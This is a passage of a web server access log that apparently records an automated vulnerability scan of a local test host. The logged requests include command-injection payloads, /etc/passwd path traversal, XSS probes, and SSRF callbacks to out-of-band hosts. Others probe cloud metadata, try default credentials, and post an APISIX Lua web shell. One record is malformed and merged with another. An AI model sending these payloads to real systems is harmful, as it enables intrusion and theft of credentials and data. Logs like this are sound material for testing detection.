Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:26 +0000","request_body":"{\x0D\x0A \x22filters\x22: [\x0D\x0A {\x0D\x0A \x22id\x22: \x22nuclei\x22,\x0D\x0A \x22filters\x22: [\x0D\x0A {\x0D\x0A \x22condition\x22: {\x0D\x0A \x22parameterValues\x22: {\x0D\x0A \x22nuclei\x22: \x22script::Runtime.getRuntime().exec('id')\x22\x0D\x0A },\x0D\x0A \x22type\x22: \x22profilePropertyCondition\x22\x0D\x0A }\x0D\x0A }\x0D\x0A ]\x0D\x0A }\x0D\x0A ],\x0D\x0A \x22sessionId\x22: \x22nuclei\x22\x0D\x0A}\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /context.json HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-ajax.php?action=dff1db99c9ecc3c645a4239e20e8ba32 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /public/login.htm?type=probes HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /getFavicon?host=http://ca285tosmpvbafqg07h0tm9i6todnsjk9.oast.fun HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /inormalydonotexist HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/wp-swimteam/include/user/download.php?file=/etc/passwd&filename=/etc/passwd&contenttype=text/html&transient=1&abspath=/usr/share/wordpress HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:26 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /altair HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.032","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/redirection/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:26 +0000","request_body":"{\x22O_\x22: \x22A\x22, \x22F_\x22: \x22EXEC_CMD\x22, \x22S_\x22: 123456789, \x22P1_\x22: {\x22Q\x22: \x22cat /etc/passwd\x22, \x22F\x22: \x22EXEC_CMD\x22}, \x22V_\x22: 1}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cgi-bin/libagent.cgi?type=J HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.sh_history HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v1/namespaces/default/pods HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/mappings HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /access/config HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cache/backup/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.live HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login?redirect=%2F HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:26 +0000","request_body":"{\x22name\x22:\x22\x22,\x22before\x22:\x22\x22,\x22after\x22:\x22\x22,\x22direction\x22:\x22desc\x22,\x22order_by\x22:\x22date\x22,\x22num_of_rows\x22:100}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /ui/api/v1/global-search/builds?jfLoader=true HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /public/login.htm?type=requests HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /version.web HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /www/delivery/afr.php?refresh=10000&\x22)',10000000);alert(1337);setTimeout('alert(\x22 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /v3/settings/first-login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.jsp?operatorlocale=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:26 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/cask/graphql-playground HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /weibo/topic/%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //%5cexample.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:26 +0000","request_body":"\x0D\x0A\x0D\x0A&e1;","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.zsh_history HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /zenario/admin/welcome.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /account/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /controller/config HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.backup HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /zdm/login_xdm_uc.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /loadtextfile.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_orgchart&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /phppgadmin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?g=g&m=Door&a=index&content=\x0D\x0A\x0D\x0Apingback.ping\x0D\x0A\x0D\x0A\x0D\x0Ahttp://ca285tosmpvbafqg07h0fr4myx68f35fi.oast.fun\x0D\x0A\x0D\x0A\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /xmlrpc/pingback HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /assets/file:%2f%2f/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /css_parser.php?css=css_parser.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /WebInterface/login.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /components/com_rwcards/captcha/captcha_image.php?img=../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:27 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/graphql/v1 HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /axis/happyaxis.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:27 +0000","request_body":"username=admin&passwd=admin","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /sess-bin/login_handler.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"http://127.0.0.1/sess-bin/login_session.cgi", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /////example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"aws.interact.sh","request":"GET http://aws.interact.sh/metadata/instance?api-version=2021-02-01 HTTP/1.1","status":"400","body_bytes_sents":"0","req_time":"5.035","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"169.254.169.254","request":"GET http://169.254.169.254/openstack/latest HTTP/1.1","status":"400","body_bytes_sents":"0","req_time":"5.229","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /logs/development.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:27 +0000","request_body":"username=Administrator&password=versa123&sso=systemRadio","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /versa/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:27 +0000","request_body":"","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /nacos/v1/cs/configs?dataId=nacos.cfg.dataIdfoo&group=foo&content=helloWorld HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /counters HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /groovyconsole HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.old HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:27 +0000","request_body":"USERNAME=student&PASSWORD=student@123&language=en&log=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /index.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:27 +0000","request_body":"{\x0D\x0A \x22uri\x22:\x22/29KAXyKaIsqR8jr92zg3XJ3Xvzm\x22,\x0D\x0A \x22script\x22:\x22local _M = {} \x5Cn function _M.access(conf, ctx) \x5Cn local os = require('os')\x5Cn local args = assert(ngx.req.get_uri_args()) \x5Cn local f = assert(io.popen(args.cmd, 'r'))\x5Cn local s = assert(f:read('*a'))\x5Cn ngx.say(s)\x5Cn f:close() \x5Cn end \x5Cnreturn _M\x22,\x0D\x0A \x22upstream\x22:{\x0D\x0A \x22type\x22:\x22roundrobin\x22,\x0D\x0A \x22nodes\x22:{\x0D\x0A \x22example.com:80\x22:1\x0D\x0A }\x0D\x0A }\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /apisix/admin/routes HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.020","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-app.log 